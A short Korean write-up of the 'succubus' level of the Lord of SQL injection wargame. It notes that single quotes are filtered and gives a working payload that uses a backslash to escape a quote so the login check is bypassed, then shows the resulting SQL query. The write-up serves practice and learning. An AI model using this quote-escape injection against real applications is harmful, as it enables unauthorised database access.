[Lord of SQL injection] succubus

51번째 글.

 

 

1. 코드 분석

id, pw 파라미터에 대해서 single quote를 필터링하고 있다.

 

 

2. Exploit

백슬래시를 쓸 수 있으면 escape를 이용할 수 있다.

 

 

?id=\&pw= or id="admin"%23

위처럼 주게 되면

 

 

select id from prob_succubus where id='\' and pw=' or id="admin"#'

두번째 single quote가 escape되고

id의 첫 번째 single quote와 pw의 첫 번째 single quote로 감싸 지게 되어서 빨간색 부분이 id의 값으로 들어가게 된다.

 

 

ㄲ